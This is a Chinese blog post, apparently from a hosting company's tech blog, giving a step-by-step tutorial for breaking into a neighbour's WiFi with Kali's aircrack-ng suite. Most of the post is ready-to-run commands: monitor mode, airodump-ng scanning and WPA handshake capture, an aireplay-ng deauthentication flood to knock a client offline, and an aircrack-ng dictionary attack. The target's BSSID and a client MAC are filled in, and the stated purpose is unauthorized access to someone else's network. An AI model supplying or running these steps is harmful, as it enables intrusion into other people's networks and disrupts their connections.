创新路
我们一直在努力

利用kali自带工具破解wifi密码

隔壁老王太过分了,改了wifi密码,万能钥匙不管用了,正好手头有无线网卡,芯片为3070或者1887L都支持Linux,某宝有售。

过程:

1、选择合适的网卡

image.png

2、开启监听

image.png

3、查看监听模式是否开启成功(网卡名称变成wlan0mon说明已经开启成功)

image.png

4、输入“airodump-ng wlan0mon”,扫描附近热点信息,找到自己想要破解的热点名称后按下ctrl+c停止扫描

image.png

 5、抓取握手包。命令格式“airodump-ng -c {CH} –bssid {BSSID} -w {要保存握手包的目录}”输入:airodump-ng -c 11 –bssid 3C:FA:43:7E:57:48 -w /home/ wlan0mon,当抓到握手包的时候箭头处会显示”handshake“字样。

image.png

 6、可以看到现在抓不到握手包,是因为没有客户端与AP进行连接。但是我们看到了一个已连接的热点,我们发送反认证包,让其下线,然后改客户端会重新尝试连接热点,然后我们就可以抓到握手包了。

新开一个终端窗口,命令格式为:aireplay-ng -0 {发送反认证包的个数} -a {BSSID} -c {强制下线的MAC地址(STATION下面的地址)} 无线网卡名称

输入“aireplay-ng -0 10 -a 3C:FA:43:7E:57:48 -c 30:10:B3:DC:9F:75 wlan0mon”,系统会下线,然后重新连接,然后我们就可以抓到握手包了。

image.png

 7、按下ctrl+c停止抓包。进到/home目录下查看握手包,其中"-01.cap"是我们一会儿破解要用到的数据包

image.png

8、使用aircrack-ng进行破解。命令格式:aircrack-ng -w {本地的字典文件(破解的关键)} {握手包}

输入"aircrack-ng -w top3000.txt /home/-01.cap",由于握手包命名的特殊性,这里只能使用绝对路径,可以改个名字就可以使用相对路径了

image.png

其实以上都不重要,关键是要有一本好用的字典,这里就不提供了,请自行搜索,还有很多方法,但总得来说都是通过跑字典的方式,比如还有什么水滴、奶瓶子类的工具或是方法。

未经允许不得转载:天府数据港官方信息博客 » 利用kali自带工具破解wifi密码

客官点个赞呗! (0)
分享到:

评论 抢沙发

评论前必须登录!

天府云博 - 做有态度的开发&运维&设计学习分享平台!

联系我们百度云主机